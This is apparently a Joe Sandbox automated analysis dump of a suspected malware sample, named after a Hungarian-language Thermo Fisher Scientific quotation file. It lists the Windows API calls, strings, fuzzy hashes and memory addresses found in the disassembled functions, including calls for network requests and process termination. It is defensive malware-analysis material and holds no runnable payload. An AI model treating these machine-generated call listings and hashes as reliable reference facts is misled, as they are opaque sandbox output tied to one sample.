                                                              • Instruction ID: 482bc4b1f4f0d44762ddec79abf7bf4f35730c5831c62beb5f6580b4b69557e6
                                                              • Opcode Fuzzy Hash: c4f5e496ee5bc32615eb079498c3a46edf905cf46feecbe384a11bb06f1765bf
                                                              • Instruction Fuzzy Hash: A6111B7600014DBFEF129F90DC88EEA7F6EEF09354F048112BE18991A1D7719E55DBA0
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0063E1C0
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0063E1D1
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0063E1D8
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0063E1E0
                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0063E1F7
                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0063E209
                                                                • Part of subcall function 00639AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00639A05,00000000,00000000,?,00639DDB), ref: 0063A53A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$ExceptionRaiseRelease
                                                              • String ID:
                                                              • API String ID: 603618608-0
                                                              • Opcode ID: 4fd45d618be5a7bf5861fe703bcbd46a9e80f17627ff64abc3beca1ae0aee41a
                                                              • Instruction ID: 9e87820525159fd69bf353714d917eadc6ff8ed2c0cec1ae457315454552e32c
                                                              • Opcode Fuzzy Hash: 4fd45d618be5a7bf5861fe703bcbd46a9e80f17627ff64abc3beca1ae0aee41a
                                                              • Instruction Fuzzy Hash: C10171B5A40219BBEB109BA58C45A5ABFBAEB48351F004166EA04A73D0D6719C008BB0
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 00627B47
                                                                • Part of subcall function 0062123A: __initp_misc_winsig.LIBCMT ref: 0062125E
                                                                • Part of subcall function 0062123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00627F51
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00627F65
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00627F78
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00627F8B
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00627F9E
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00627FB1
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00627FC4
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00627FD7
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00627FEA
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00627FFD
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00628010
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00628023
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00628036
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00628049
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0062805C
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0062806F
                                                              • __mtinitlocks.LIBCMT ref: 00627B4C
                                                                • Part of subcall function 00627E23: InitializeCriticalSectionAndSpinCount.KERNEL32(006BAC68,00000FA0,?,?,00627B51,00625E77,006B6C70,00000014), ref: 00627E41
                                                              • __mtterm.LIBCMT ref: 00627B55
                                                                • Part of subcall function 00627BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00627B5A,00625E77,006B6C70,00000014), ref: 00627D3F
                                                                • Part of subcall function 00627BBD: _free.LIBCMT ref: 00627D46
                                                                • Part of subcall function 00627BBD: DeleteCriticalSection.KERNEL32(006BAC68,?,?,00627B5A,00625E77,006B6C70,00000014), ref: 00627D68
                                                              • __calloc_crt.LIBCMT ref: 00627B7A
                                                              • GetCurrentThreadId.KERNEL32 ref: 00627BA3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 2942034483-0
                                                              • Opcode ID: 8f6f6895db56c83319cfebe453e1a893624daaf0ff20a68f2af3288cc4375fd5
                                                              • Instruction ID: 159ef44e2a7b5b34bd31fc4ec03c13c3546c1d637cb6ce8f29930a05ae1ee1ae
                                                              • Opcode Fuzzy Hash: 8f6f6895db56c83319cfebe453e1a893624daaf0ff20a68f2af3288cc4375fd5
                                                              • Instruction Fuzzy Hash: 3AF0963250DF3229E7A47B75BC46E8A26979F01731F21179DF8A0C51D1FF2198414D79
                                                              APIs
                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0060281D
                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00602825
                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00602830
                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0060283B
                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00602843
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0060284B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Virtual
                                                              • String ID:
                                                              • API String ID: 4278518827-0
                                                              • Opcode ID: 0637434fde68084997fdcd75e7dc509799036d70fcdc6f9f58a828bb586cb5b1
                                                              • Instruction ID: 92f2f474de3c715101df0ac3a5b38ad6c75bdd2b7f402766da55d49b0db7cacf
                                                              • Opcode Fuzzy Hash: 0637434fde68084997fdcd75e7dc509799036d70fcdc6f9f58a828bb586cb5b1
                                                              • Instruction Fuzzy Hash: 7E0148B0901B597DE3008F6A8C85A52FFA8FF15354F00421B915C47941C7B5A864CBE5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 1423608774-0
                                                              • Opcode ID: 62977462a2a2ca4288a95e8f82fe49afe543be428f5fd6bc42583ee047fd1590
                                                              • Instruction ID: c183569cbccaae90216211f64ae0dfa8d0a879f65ab1cf2e1e175dd9fb087bea
                                                              • Opcode Fuzzy Hash: 62977462a2a2ca4288a95e8f82fe49afe543be428f5fd6bc42583ee047fd1590
                                                              • Instruction Fuzzy Hash: 55018132182211BBDB652B54EC58DEB777BFF89711B041629F603922E4DB749940DB70
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00647C07
                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00647C1D
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00647C2C
                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00647C3B
                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00647C45
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00647C4C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 839392675-0
                                                              • Opcode ID: 146745766daad7e0827cf15c50664d954bfecc8371fa89c3b6edf4d9bcf75778
                                                              • Instruction ID: 85b291f9acaa87fb945acf563c9e596d53b4e2d1704208108c4f57bfebf1596e
                                                              • Opcode Fuzzy Hash: 146745766daad7e0827cf15c50664d954bfecc8371fa89c3b6edf4d9bcf75778
                                                              • Instruction Fuzzy Hash: 57F03A72241158BBE7215B529C0EEEF7B7DEFC6B21F000218FA01D1191E7A05A81C7B5
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00649A33
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,00675DEE,?,?,?,?,?,0060ED63), ref: 00649A44
                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,00675DEE,?,?,?,?,?,0060ED63), ref: 00649A51
                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00675DEE,?,?,?,?,?,0060ED63), ref: 00649A5E
                                                                • Part of subcall function 006493D1: CloseHandle.KERNEL32(?,?,00649A6B,?,?,?,00675DEE,?,?,?,?,?,0060ED63), ref: 006493DB
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00649A71
                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,00675DEE,?,?,?,?,?,0060ED63), ref: 00649A78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 3495660284-0
                                                              • Opcode ID: 493d52aa37eb66040c6cadaa4d77ab3fd2231a85d5079cd7d90ee08fae559cb1
                                                              • Instruction ID: b3a758c7f0a2854aa177535c916e13e4efb7304cf5dc45a43b3881b363d2c590
                                                              • Opcode Fuzzy Hash: 493d52aa37eb66040c6cadaa4d77ab3fd2231a85d5079cd7d90ee08fae559cb1
                                                              • Instruction Fuzzy Hash: 3CF05E32181211BBD7512BA4EC9DDEB773BFF85311B141625F603911E8DB759A01DB70
                                                              APIs
                                                                • Part of subcall function 0061F4EA: std::exception::exception.LIBCMT ref: 0061F51E
                                                                • Part of subcall function 0061F4EA: __CxxThrowException@8.LIBCMT ref: 0061F533
                                                              • __swprintf.LIBCMT ref: 00601EA6
                                                              Strings
                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00601D49
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                              • API String ID: 2125237772-557222456
                                                              • Opcode ID: e8151045dc5f5b1ca4b1b94feebbf74e2eef984cccf2a934e6c2eabbb675bb4f
                                                              • Instruction ID: 8e51fc96bcb6546b0c8ced1a650d93400ccffbd0caece8589f4b1dfd32bd073a
                                                              • Opcode Fuzzy Hash: e8151045dc5f5b1ca4b1b94feebbf74e2eef984cccf2a934e6c2eabbb675bb4f
                                                              • Instruction Fuzzy Hash: 7D918C711442019FC768EF24C895CAFB7E6AF85710F04492DF8869B2E1DB71ED05CB96
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0065B006
                                                              • CharUpperBuffW.USER32(?,?), ref: 0065B115
                                                              • VariantClear.OLEAUT32(?), ref: 0065B298
                                                                • Part of subcall function 00649DC5: VariantInit.OLEAUT32(00000000), ref: 00649E05
                                                                • Part of subcall function 00649DC5: VariantCopy.OLEAUT32(?,?), ref: 00649E0E
                                                                • Part of subcall function 00649DC5: VariantClear.OLEAUT32(?), ref: 00649E1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4237274167-1221869570
                                                              • Opcode ID: a9c1195127372a1a1d94c695871136027f561debd898a2ad7a530a1bd4cd7c18
                                                              • Instruction ID: 6675e269f272b411451fd0100344863d4974b98690f6d77079637bb63b358ad0
                                                              • Opcode Fuzzy Hash: a9c1195127372a1a1d94c695871136027f561debd898a2ad7a530a1bd4cd7c18
                                                              • Instruction Fuzzy Hash: D5918D706083019FCB54DF24C4819ABB7F6EF89714F04496DF89A9B392DB31E949CB62
                                                              APIs
                                                                • Part of subcall function 0061C6F4: _wcscpy.LIBCMT ref: 0061C717
                                                              • _memset.LIBCMT ref: 00645438
                                                              • GetMenuItemInfoW.USER32(?), ref: 00645467
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00645513
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0064553D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                              • String ID: 0
                                                              • API String ID: 4152858687-4108050209
                                                              • Opcode ID: c3d6510ad8294ab3decec7c01cbcaf7e54328a81007e68e6de0094ebaeb9e398
                                                              • Instruction ID: c46408b6ac31441e7e17203a52b39415601e376d33bc43c926b15232b49b2997
                                                              • Opcode Fuzzy Hash: c3d6510ad8294ab3decec7c01cbcaf7e54328a81007e68e6de0094ebaeb9e398
                                                              • Instruction Fuzzy Hash: E751C1716047019BD7599F28C841BBBB7EBEB86750F04062EF896D72D3EB60CD448B92
                                                              APIs
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0064027B
                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006402B1
                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006402C2
                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00640344
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                              • String ID: DllGetClassObject
                                                              • API String ID: 753597075-1075368562
                                                              • Opcode ID: b0e008e7289235cad80e78ec6eae85f575b32ad8e616a3c7ba692ad0ded3ac37
                                                              • Instruction ID: 5775ba8db7e73aed7f6c839b47354b6144f65b8f6f1ee02b7416ef4764ed86aa
                                                              • Opcode Fuzzy Hash: b0e008e7289235cad80e78ec6eae85f575b32ad8e616a3c7ba692ad0ded3ac37
                                                              • Instruction Fuzzy Hash: F0415EB1600215EFEB06DF54C884B9A7FBAEF44714B1481ADEE099F246D7B1D944CBA0
                                                              APIs
                                                              • _memset.LIBCMT ref: 00645075
                                                              • GetMenuItemInfoW.USER32 ref: 00645091
                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 006450D7
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006C1708,00000000), ref: 00645120
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem_memset
                                                              • String ID: 0
                                                              • API String ID: 1173514356-4108050209
                                                              • Opcode ID: 762848cd13e91b35e23b718b51f5149e8166681a4b7794cb102d56362921dee2
                                                              • Instruction ID: 56bebc8222bd8db99ae879fc3a9541d87f54bca126c3b0604031ccd0b6371261
                                                              • Opcode Fuzzy Hash: 762848cd13e91b35e23b718b51f5149e8166681a4b7794cb102d56362921dee2
                                                              • Instruction Fuzzy Hash: 4241E234204741AFD720DF24D881B6ABBE6AF8A724F144A5EF856973D2D730E800CB66
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00660587
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower
                                                              • String ID: cdecl$none$stdcall$winapi
                                                              • API String ID: 2358735015-567219261
                                                              • Opcode ID: 846ffd0f01967865c0d77177cfe994d73282bee8ba1b55ff593e3c93323b61ed
                                                              • Instruction ID: f36b5d25c3bfad4112583168db6ee3b6bceb20b4139c95d5b09572eb2466d92c
                                                              • Opcode Fuzzy Hash: 846ffd0f01967865c0d77177cfe994d73282bee8ba1b55ff593e3c93323b61ed
                                                              • Instruction Fuzzy Hash: 4C31AB70500216ABCF04EF64CC419EFB7BAFF55314B008A2DE826A76D1DB71E956CB90
                                                              APIs
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0063B88E
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0063B8A1
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 0063B8D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 05acf8c082b8e707b4d8d891b5bfffa10ecb3dd54da9a486a8588308af1158bd
                                                              • Instruction ID: 13c675d997a1ec94907d98a5e612cb724a96483911a5ea2808042f64ae414476
                                                              • Opcode Fuzzy Hash: 05acf8c082b8e707b4d8d891b5bfffa10ecb3dd54da9a486a8588308af1158bd
                                                              • Instruction Fuzzy Hash: 4E21E1B1A40108BFDB48AB68D886DFF77BEDF05360F10522DF521A21E1DB744D4697A4
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00654401
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00654427
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00654457
                                                              • InternetCloseHandle.WININET(00000000), ref: 0065449E
                                                                • Part of subcall function 00655052: GetLastError.KERNEL32(?,?,006543CC,00000000,00000000,00000001), ref: 00655067
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 1951874230-3916222277
                                                              • Opcode ID: 36f1c611bee39654dd4960c4abdf16af66014aa30ee49ea6506f08477a00f147
                                                              • Instruction ID: c2f84b007ebfcfb20fde39a340bb53f80e29036f70b6a86044a7c7af590bddef
                                                              • Opcode Fuzzy Hash: 36f1c611bee39654dd4960c4abdf16af66014aa30ee49ea6506f08477a00f147
                                                              • Instruction Fuzzy Hash: 6321CFB2540208BFE7119F54CC85FBFB7FEEB48759F10815AF90992280EE648D4997B0
                                                              APIs
                                                                • Part of subcall function 0061D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0061D1BA
